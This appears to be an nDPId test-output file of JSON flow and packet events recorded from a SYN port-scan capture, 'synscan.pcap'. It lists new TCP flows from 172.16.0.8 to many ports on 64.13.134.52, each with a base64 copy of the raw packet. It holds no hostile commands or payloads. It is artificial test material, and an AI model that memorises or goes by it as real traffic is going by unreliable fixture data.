+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsFL0AADgG+7WsEAAIQA2GNIzSDJXdUoMYAAAAAGACBAAn+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsrY4AADkGYeSsEAAIQA2GNIzSCf3dUoMYAAAAAGACCAAmkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsa9wAADQGqJasEAAIQA2GNIzSACXdUoMYAAAAAGACBAA0agAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs78gAACwGLKqsEAAIQA2GNIzSCFfdUoMYAAAAAGACBAAsOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv00AACwGXSWsEAAIQA2GNIzSCvndUoMYAAAAAGACBAAplgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs9QwAADoGGWasEAAIQA2GNIzSx5\/dUoMYAAAAAGACDABk7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZkAAC0GUdmsEAAIQA2GNIzSDx\/dUoMYAAAAAGACCAAhcAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsVS8AADkGukOsEAAIQA2GNIzSAA3dUoMYAAAAAGACCAAwggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv\/MAADkGT3+sEAAIQA2GNIzSFqndUoMYAAAAAGACCAAZ5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsI4UAADEG8+2sEAAIQA2GNIzSDPrdUoMYAAAAAGACCAAjlQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060558,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_packet_id":1,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060558,"pkt":"ACYLMQczACWzv5HuCABFAAAsrqQAADcGYs6sEAAIQA2GNIzSB+XdUoMYAAAAAGACEAAgqgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060559,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_packet_id":1,"flow_last_seen":1278275060559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060559,"pkt":"ACYLMQczACWzv5HuCABFAAAsFrkAADkG+LmsEAAIQA2GNIzSDQXdUoMYAAAAAGACCAAjigAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAswpEAADIGU+GsEAAIQA2GNIzTB87dU4MZAAAAAGACDAAkvgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeIAAC8G65CsEAAIQA2GNIzTAaDdU4MZAAAAAGACEAAm7AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsffkAACoGoHmsEAAIQA2GNIzTlZTdU4MZAAAAAGACDACW9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFAAADUGSyKsEAAIQA2GNIzSF9TdUoMYAAAAAGACCAAYuwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsH38AADoG7vOsEAAIQA2GNIzSAtDdUoMYAAAAAGACDAApvwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7gAAC0G07qsEAAIQA2GNIzSH1\/dUoMYAAAAAGACCAARMAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsglEAADIGlCGsEAAIQA2GNIzSAJLdUoMYAAAAAGACDAAr\/QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AADcG87SsEAAIQA2GNIzSAZfdUoMYAAAAAGACEAAm+AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyacAADgGRsusEAAIQA2GNIzSDPvdUoMYAAAAAGACBAAnlAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADcGv+WsEAAIQA2GNIzSYODdUoMYAAAAAGACEADHrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsEx8AADUGAFSsEAAIQA2GNIzSHz\/dUoMYAAAAAGACCAARUAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsi8gAACsGkaqsEAAIQA2GNIzSS5bdUoMYAAAAAGACEADc+AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv2QAACUGZA6sEAAIQA2GNIzS8czdUoMYAAAAAGACCAA+wgAAAgQFtA=="} 